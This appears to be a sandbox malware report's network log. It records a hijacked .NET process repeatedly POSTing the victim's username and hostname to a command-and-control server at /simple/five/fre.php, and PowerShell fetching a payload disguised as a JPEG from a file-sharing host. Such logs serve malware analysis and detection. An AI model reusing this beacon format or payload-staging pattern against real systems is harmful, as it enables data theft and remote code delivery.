Nov 15, 2024 18:15:42.287477016 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:43.271620989 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	50039	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:43.427052021 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:43.432085037 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:44.406034946 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	50040	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:44.553605080 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:44.558614016 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:45.497798920 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	50041	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:45.640340090 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:45.645313025 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:46.620285034 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	50042	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:46.933274984 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:46.938497066 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:47.899243116 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	50043	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:48.048041105 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:48.052999973 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:49.008040905 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	50044	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:49.193806887 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:49.198771954 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:50.169981003 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	50045	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:51.309339046 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:51.314217091 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:52.304002047 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	50046	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:52.467847109 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:52.472929001 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:53.784013033 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	50047	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:53.946496010 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:53.951385975 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:54.916069031 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	50048	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:55.073044062 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:55.077914000 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:56.055499077 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	50049	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:56.201775074 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:56.206763029 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:57.189745903 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	50050	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:57.347786903 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:57.353616953 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:58.301390886 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	50051	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:58.465945005 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:58.470890999 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:59.439821959 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	50052	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:59.596467018 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:59.601398945 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:16:00.576663971 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:16:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	50053	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:16:00.723691940 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:16:00.728619099 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:16:01.676630020 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:16:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	50054	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:16:01.829083920 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:16:01.834857941 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:16:02.802675962 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:16:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	50055	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:16:03.160758018 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:16:03.165663004 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:16:04.169306993 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:16:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	50056	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:16:04.332446098 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:16:04.337363958 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:16:05.363466024 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:16:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	50057	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:16:05.830832958 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:16:05.839273930 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:16:06.516520977 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:16:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	142.215.209.78	443	5536	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-15 17:14:14 UTC	192	OUT	GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1 Host: 1017.filemail.com Connection: Keep-Alive
2024-11-15 17:14:14 UTC	324	IN	HTTP/1.1 200 OK Content-Length: 2230233 Content-Type: image/jpeg Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT Accept-Ranges: bytes ETag: 4bb5a8185f3b16880e3dcc573015c5d9 X-Transfer-ID: wxhdiueivoluihj Content-Disposition: attachment; filename=new_imagem.jpg Date: Fri, 15 Nov 2024 17:14:14 GMT Connection: close
